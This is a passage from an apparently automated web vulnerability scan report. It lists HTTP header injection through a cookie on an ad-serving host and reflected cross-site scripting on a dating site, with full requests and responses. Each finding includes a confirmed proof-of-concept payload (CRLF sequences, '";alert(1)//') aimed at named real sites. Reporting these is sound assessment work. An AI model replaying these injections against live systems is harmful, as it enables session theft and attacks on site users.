B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 23 Nov 2010 03:27:18 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWfBAg9QdG03ai0000o61wrWez3M9MXe05qO9MXhe3wUrNfpvx9Qbf0bKd0000820wrWeT709LaB0a4c9KVBK42UrIeQyI9KVU0bnA0000820wrHei.Q9EyK07ft0000o61wrpeZOX9Qdt03ai0000820wrWfpuV9Qas0bKd0000g410rWedj59B6M09Gc0000820wrfePZ99P6K07l00000g210rTfhPu9MHD0bnA0000820wrMdtFJ9MH60aVX0000820wrMe1YN9KVH08te0000820wrHff3e9P0S03sY0000820wrTeC519MH60aVX00008y8yrMeT809KVD0a4c9KVEm5xorHf2Ca9KVJ02Hn0000820wrHfGff9Qe30bPK9Qd9m5xorWdP239QaW0bfK0000820wrWewrC9P6K0bfD0000820wrTedd99KVI077T0000820wrHf5Kg9KTC07g60000820wrHeBgi9QdI04PT0000820wrW; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7grL0820wrH6OeH0820wrW6SKe0820wrH6VCF0820wrf7hMi0m5xorH7FL40o61wrW7fP70820wrW76AK0e3wUrN785p0820wrW6V2p0820wrH7nwv0820wrH745g061worW7nig0820wrH5suX0g210rT7yh30g410rW70vL0o61wrp7FLX0m5xorW74..0820wrT7yh50820wrW6UUT0820wrT7luQ0820wrM7hMh0K42UrI6E4C0gA92rM6E4D0820wrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0t+c820wrT000000g_0vq9o61wrW0000001_0uv2820wrH0000001_0u3Je3wUrN0000020_0rUe820wrW0000001_0tIT820wrH0000080_0u6F820wrM0000040_0tye820wrW0000001_0uSU820wrW0000008_0tJNo61wrW0000001_0tUC820wrT0008000_0uf9820wrH0000w00_0vHUm5xorW0000001_0tUd820wrH0000001_0sTh820wrf0000001_0uXiS43orI0000002_0t8ko61wrp0000w00_0uRt820wrH00000g0_0upO61worW0000000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0upO009p61worW0sJz02lBoC9yrM0t8k00iZo61wrp0vq905Zwo61wrW0uSU00m+820wrW0tJN00m+o61wrW0tye01xc820wrW0u3J01B9e3wUrN0tIT00cN820wrH0tUC0053820wrT0uXi00Y3S43orI0t+c00iZ820wrT0tUd001N820wrH0u6F004H820wrM0ppC00iZg210rT0rUe00m+820wrW0vHU00m+m5xorW0uv201xc820wrH0sTh00ai820wrf0uf900EM820wrH0uRt03HD820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aVXoC9yrM07l0g210rT077T820wrH08te820wrH03aiw820rW03sY820wrT0a4cS43orI07fto61wrp02Hn820wrH0bfK820wrW03Gz61worW05qOe3wUrN09Gc820wrf0bKdo61wrW0bfDe3wUrT0bPKm5xorW0bnAg410rM04PT820wrW07g6820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_504f0
52c6ed00ba4
=4105167
Location: http://ds.serving-sys.com/BurstingRes/Site-1470/Type-0/3a3fa324-aacf-45d7-8247-47c3e005dc22.jpg
Content-Length: 0


1.6. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b58b%0d%0a1915b172d08 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=03b58b%0d%0a1915b172d08; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=03b58b
1915b172d08
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close


1.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 7216b%0d%0a306de5af752 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=07216b%0d%0a306de5af752; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=07216b
306de5af752
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


1.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fcafc%0d%0abef809e8cc2 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2006011&PluID=0&w=300&h=250&ord=773648220124&ifrm=1&ucm=true&ncu=$$http://media.sensis.com.au/ADCLICK/CID=000345301f45920200000000/acc_random=773648220124/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=ABV1/pageid=365717345415/relocate=$$&z=0\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0fcafc%0d%0abef809e8cc2; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 2916
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0fcafc
bef809e8cc2
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWfBAg9QdG03ai0000o61wrWez3M9MXe05qO9MXhe3wUrNfpvx9Qbf0bKd0000820wrWeT709LaB0a4c9KVBK42UrIeQyI9KVU0bnA0000820wrHei.Q9EyK07ft0000o61wrpeZOX9Qdt03ai0000820wrWfpuV9Qas0bKd0000g410rWedj59B6M09Gc0000820wrfePZ99P6K07l00000g210rTfhPu9MHD0bnA0000820wrMdtFJ9MH60aVX0000820wrMe1YN9KVH08te0000820wrHff3e9P0S03sY0000820wrTeC519MH60aVX00008y8yrMeT809KVD0a4c9KVEm5xorHf2Ca9KVJ02Hn0000820wrHfGff9Qd70bPK9Qd9e3wUrWfEsU9Qe30bPK0000820wrWdP239QaW0bfK0000820wrWewrC9P6K0bfD0000820wrTedd99KVI077T0000820wrHf5Kg9KTC07g60000820wrHeBgi9QdI04PT0000820wrW; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7grL0820wrH6OeH0820wrW6SKe0820wrH6VCF0820wrf7hMi0m5xorH7FL40o61wrW7fP70820wrW76AK0e3wUrN785p0820wrW6V2p0820wrH7nwv0820wrH745g061worW7nig0820wrH5suX0g210rT7yh30g410rW70vL0o61wrp7FLX0m5xorW74..0820wrT7yh50820wrW6UUT0820wrT7luQ0820wrM7hMh0K42UrI6E4C0gA92rM6E4D0820wrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0t+c820wrT000000g_0vq9o61wrW0000001_0uv2820wrH0000001_0u3Je3wUrN0000020_0rUe820wrW0000001_0tIT820wrH0000080_0u6F820wrM0000040_0tye820wrW0000001_0uSU820wrW0000008_0tJNo61wrW0000001_0tUC820wrT0008000_0uf9820wrH0000w00_0vHUm5xorW0000001_0tUd820wrH0000001_0sTh820wrf0000001_0uXiS43orI0000002_0t8ko61wrp0000w00_0uRt820wrH00000g0_0upO61worW0000000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0upO009p61worW0sJz02lBoC9yrM0t8k00iZo61wrp0vq905Zwo61wrW0uSU00m+820wrW0tJN00m+o61wrW0tye01xc820wrW0u3J01B9e3wUrN0tIT00cN820wrH0tUC0053820wrT0uXi00Y3S43orI0t+c00iZ820wrT0tUd001N820wrH0u6F004H820wrM0ppC00iZg210rT0rUe00m+820wrW0vHU00m+m5xorW0uv201xc820wrH0sTh00ai820wrf0uf900EM820wrH0uRt03HD820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aVXoC9yrM07l0g210rT077T820wrH08te820wrH03aiw820rW03sY820wrT0a4cS43orI07fto61wrp02Hn820wrH0bfK820wrW03Gz61worW05qOe3wUrN09Gc820wrf0bKdo61wrW0bfDe3wUrT0bPKm5xorW0bnAg410rM04PT820wrW07g6820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Connection: close

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2. Cross-site scripting (reflected)
There are 776 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://bigpond.eharmony.com.au/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff716"%3balert(1)//ce6330e97f5 was submitted in the aid parameter. This input was echoed as ff716";alert(1)//ce6330e97f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653&aid=1000ff716"%3balert(1)//ce6330e97f5&pid=1000&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:27:00 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653|aid=1000ff716alert1ce6330e97f5|pid=1000|ref=Dating; expires=Thu, 23-Dec-2010 03:27:00 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:42:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3859747244.16671.0000; path=/
Set-Cookie: lbid=dd03e1ce-c870-46bf-4f21-93453fb42045;expires=Sun, 22-May-2011 03:27:00 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
"";
                       s.prop4="";
                       s.prop5="";
                       s.prop25="";                        
                       s.prop31="";
                       s.prop32="";

                       /* cid,aid,pid,aff_id */
                       s.prop8="55653";
                       s.evar8="55653";

                       s.prop7="1000ff716";alert(1)//ce6330e97f5";
                       s.evar7="1000ff716";alert(1)//ce6330e97f5";

                       s.prop33="1000";
                       s.evar33="1000";

                       s.prop48="";
                       s.evar48="";

                       /* Conversion variables */
                       s.products="";
                       s
...[SNIP]...

2.2. http://bigpond.eharmony.com.au/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228d2"%3balert(1)//66a421fe9a4 was submitted in the cid parameter. This input was echoed as 228d2";alert(1)//66a421fe9a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=55653228d2"%3balert(1)//66a421fe9a4&aid=1000&pid=1000&ref=Dating HTTP/1.1
Host: bigpond.eharmony.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:26:59 GMT
Server: Apache/2.2.16 (Unix)
X-Powered-By: PHP/5.2.14
Set-Cookie: eh_aff_tracking=cid=55653228d2alert166a421fe9a4|aid=1000|pid=1000|ref=Dating; expires=Thu, 23-Dec-2010 03:26:59 GMT; path=/; domain=.eharmony.com.au
Cache-Control: max-age=900
Expires: Tue, 23 Nov 2010 03:41:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerFront=3893301676.16671.0000; path=/
Set-Cookie: lbid=6f56d95c-6f1b-4784-6f08-d36dfdd0c91b;expires=Sun, 22-May-2011 03:26:59 GMT;path=/;domain=.eharmony.com.au;
Content-Length: 37540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><!-- PAGE OK --><head><meta http-equ
...[SNIP]...
       s.prop1="";
                       s.prop2="";
                       s.prop3="";
                       s.prop4="";
                       s.prop5="";
